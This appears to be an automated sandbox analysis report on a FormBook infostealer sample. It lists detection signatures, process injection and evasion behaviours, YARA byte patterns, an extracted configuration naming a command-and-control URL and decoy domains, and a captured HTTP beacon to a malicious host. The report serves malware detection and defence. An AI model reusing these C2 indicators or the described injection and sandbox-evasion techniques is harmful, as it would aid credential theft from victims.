Play interactive tour

Edit tour

Windows Analysis Report #6495PI-29458-2020.exe

Overview

General Information

Sample Name:	#6495PI-29458-2020.exe
Analysis ID:	452525
MD5:	020c3201638570f2858099e3e522a9a0
SHA1:	c3977925522b50fc59c2d2e1e014e24052d36fce
SHA256:	24e635e80cecd03066225b27fdb524c4542586b22dc820e05f8a02072008c674
Tags:	exeformbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses netsh to modify the Windows network and firewall settings

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

#6495PI-29458-2020.exe (PID: 5040 cmdline: 'C:\Users\user\Desktop\#6495PI-29458-2020.exe' MD5: 020C3201638570F2858099E3E522A9A0)

#6495PI-29458-2020.exe (PID: 4372 cmdline: {path} MD5: 020C3201638570F2858099E3E522A9A0)

explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

netsh.exe (PID: 5852 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

cmd.exe (PID: 5864 cmdline: /c del 'C:\Users\user\Desktop\#6495PI-29458-2020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nouolive.com/wt5i/"], "decoy": ["mydreamct.com", "vadicore.com", "choicemango.com", "projectsolutionspro.com", "ncg.xyz", "goio.digital", "ee-secure-account.com", "criminalstudy.com", "fsjuanzhi.com", "pont-travaux-public.com", "agencepartenaire.com", "jlsyzm.com", "prosselius.com", "woodendgroups.com", "thereproducts.site", "sigmagrupo.net", "chelseagracia.com", "fusosstore.com", "chrissypips.trade", "mvlxplcswa.com", "sneguard.com", "travellingcomet.com", "ledbydesign.asia", "yaysondaj.com", "recoverydharma.guide", "peak8000.com", "alltranslation.xyz", "igorkozel.com", "x-box2send.club", "campgoodco.com", "arrowinvestments-technology.com", "naturally-preserved.com", "vk-authorization.site", "xn--12cfjb7d8dd4ftb6cr0g5e.net", "losjazminesdelamolina.com", "farmaciamoyatoledo134fmas.com", "sgainme.com", "corcoran.network", "nestarchitectural.com", "nnltsy.com", "wyoming-interactive.net", "laomao.site", "qiwuwenhua.com", "conectals.com", "wanggou0579.com", "nanmedia.info", "kindredheatrsteam.com", "passiveincomeincubator.com", "eletroclimaks.com", "getbackmode.com", "clearvuetaxadvisors.com", "pick-assiette.com", "tribelinx.com", "1bodymobile.com", "united-for-humanity.net", "hoatao.xyz", "isbpestcontrol.com", "nieght.com", "pinoyhoustontv.com", "bloochy.com", "greatestpotever.com", "onikidil.com", "inspirainstitute.com", "yourcariq.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000014.00000002.604028874.0000000000B50000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000002.604028874.0000000000B50000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000002.604028874.0000000000B50000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.440393594.0000000002A08000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000014.00000002.605088618.0000000003110000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000002.605088618.0000000003110000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000002.605088618.0000000003110000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.442703762.00000000039A1000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.442703762.00000000039A1000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x102320:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x10258a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12e940:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12ebaa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x10e0ad:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13a6cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x10db99:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13a1b9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x10e1af:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13a7cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x10e327:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13a947:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x102fa2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12f5c2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x10ce14:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x139434:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x103c9b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1302bb:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x113d4f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x14036f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x114d52:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.442703762.00000000039A1000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x110e31:$sqlite3step: 68 34 1C 7B E1 0x110f44:$sqlite3step: 68 34 1C 7B E1 0x13d451:$sqlite3step: 68 34 1C 7B E1 0x13d564:$sqlite3step: 68 34 1C 7B E1 0x110e60:$sqlite3text: 68 38 2A 90 C5 0x110f85:$sqlite3text: 68 38 2A 90 C5 0x13d480:$sqlite3text: 68 38 2A 90 C5 0x13d5a5:$sqlite3text: 68 38 2A 90 C5 0x110e73:$sqlite3blob: 68 53 D8 7F 8C 0x110f9b:$sqlite3blob: 68 53 D8 7F 8C 0x13d493:$sqlite3blob: 68 53 D8 7F 8C 0x13d5bb:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.496436603.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.496436603.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.496436603.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.496991473.0000000001810000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.496991473.0000000001810000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.496991473.0000000001810000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.497054579.0000000001840000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.497054579.0000000001840000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.497054579.0000000001840000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: #6495PI-29458-2020.exe PID: 5040	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.#6495PI-29458-2020.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
13.2.#6495PI-29458-2020.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
13.2.#6495PI-29458-2020.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x175f9:$sqlite3step: 68 34 1C 7B E1 0x1770c:$sqlite3step: 68 34 1C 7B E1 0x17628:$sqlite3text: 68 38 2A 90 C5 0x1774d:$sqlite3text: 68 38 2A 90 C5 0x1763b:$sqlite3blob: 68 53 D8 7F 8C 0x17763:$sqlite3blob: 68 53 D8 7F 8C
13.2.#6495PI-29458-2020.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
13.2.#6495PI-29458-2020.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
13.2.#6495PI-29458-2020.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000014.00000002.604028874.0000000000B50000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.nouolive.com/wt5i/"], "decoy": ["mydreamct.com", "vadicore.com", "choicemango.com", "projectsolutionspro.com", "ncg.xyz", "goio.digital", "ee-secure-account.com", "criminalstudy.com", "fsjuanzhi.com", "pont-travaux-public.com", "agencepartenaire.com", "jlsyzm.com", "prosselius.com", "woodendgroups.com", "thereproducts.site", "sigmagrupo.net", "chelseagracia.com", "fusosstore.com", "chrissypips.trade", "mvlxplcswa.com", "sneguard.com", "travellingcomet.com", "ledbydesign.asia", "yaysondaj.com", "recoverydharma.guide", "peak8000.com", "alltranslation.xyz", "igorkozel.com", "x-box2send.club", "campgoodco.com", "arrowinvestments-technology.com", "naturally-preserved.com", "vk-authorization.site", "xn--12cfjb7d8dd4ftb6cr0g5e.net", "losjazminesdelamolina.com", "farmaciamoyatoledo134fmas.com", "sgainme.com", "corcoran.network", "nestarchitectural.com", "nnltsy.com", "wyoming-interactive.net", "laomao.site", "qiwuwenhua.com", "conectals.com", "wanggou0579.com", "nanmedia.info", "kindredheatrsteam.com", "passiveincomeincubator.com", "eletroclimaks.com", "getbackmode.com", "clearvuetaxadvisors.com", "pick-assiette.com", "tribelinx.com", "1bodymobile.com", "united-for-humanity.net", "hoatao.xyz", "isbpestcontrol.com", "nieght.com", "pinoyhoustontv.com", "bloochy.com", "greatestpotever.com", "onikidil.com", "inspirainstitute.com", "yourcariq.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: #6495PI-29458-2020.exe

ReversingLabs: Detection: 19%

Yara detected FormBook

Show sources

Source: Yara match	File source: 13.2.#6495PI-29458-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.#6495PI-29458-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.604028874.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.605088618.0000000003110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.442703762.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.496436603.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.496991473.0000000001810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.497054579.0000000001840000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: #6495PI-29458-2020.exe

Joe Sandbox ML: detected

Source: 13.2.#6495PI-29458-2020.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: #6495PI-29458-2020.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: #6495PI-29458-2020.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000E.00000000.464626277.000000000DC20000.00000002.00000001.sdmp
Source:	Binary string: netsh.pdb source: #6495PI-29458-2020.exe, 0000000D.00000002.497334221.00000000019D0000.00000040.00000001.sdmp
Source:	Binary string: netsh.pdbGCTL source: #6495PI-29458-2020.exe, 0000000D.00000002.497334221.00000000019D0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: #6495PI-29458-2020.exe, 0000000D.00000002.498156199.0000000001C2F000.00000040.00000001.sdmp, netsh.exe, 00000014.00000002.606306317.000000000382F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: #6495PI-29458-2020.exe, netsh.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000E.00000000.464626277.000000000DC20000.00000002.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.nouolive.com/wt5i/

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe

DNS query: www.hoatao.xyz

Source: global traffic

HTTP traffic detected: GET /wt5i/?q0DD6=2dfL90cX&8pjDV6=tXijk4hnD7izr0wZK7+l+fr5rYWJObsKdpXRzMG7/vctLDNQEZfSzrEr5AJ0mQFbfi1yOCsf5g== HTTP/1.1Host: www.hoatao.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

Source: unknown

DNS traffic detected: queries for: www.hoatao.xyz

Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000E.00000000.443706062.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: #6495PI-29458-2020.exe, 00000000.00000003.345121242.000000000108B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: #6495PI-29458-2020.exe, 00000000.00000003.345638270.00000000054E2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: #6495PI-29458-2020.exe, 00000000.00000003.345312048.00000000054E2000.00000004.00000001.sdmp, #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: #6495PI-29458-2020.exe, 00000000.00000002.447012611.00000000054B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comf
Source: #6495PI-29458-2020.exe, 00000000.00000002.447012611.00000000054B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comm
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: #6495PI-29458-2020.exe, 00000000.00000003.347449500.00000000054E2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm92
Source: #6495PI-29458-2020.exe, 00000000.00000002.447780636.00000000056C2000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: #6495PI-29458-2020.exe, 00000000.00000003.343929858.00000000054BA000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.462632067.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: #6495PI-29458-2020.exe, 00000000.00000003.343230134.00000000054B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/%
Source: #6495PI-29458-2020.exe, 00000000.00000003.343230134.00000000054B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/B
Source: #6495PI-29458-2020.exe, 00000000.00000003.343032173.00000000054B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/I
Source: #6495PI-29458-2020.exe, 00000000.00000003.343929858.00000000054BA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/P
Source: #6495PI-29458-2020.exe, 00000000.00000003.343230134.00000000054B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0trP
Source: #6495PI-29458-2020.exe, 00000000.00000003.343929858.00000000054BA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: #6495PI-29458-2020.exe, 00000000.00000003.343929858.00000000054BA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/%
Source: #6495PI-29458-2020.exe, 00000000.00000003.343929858.00000000054BA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/B
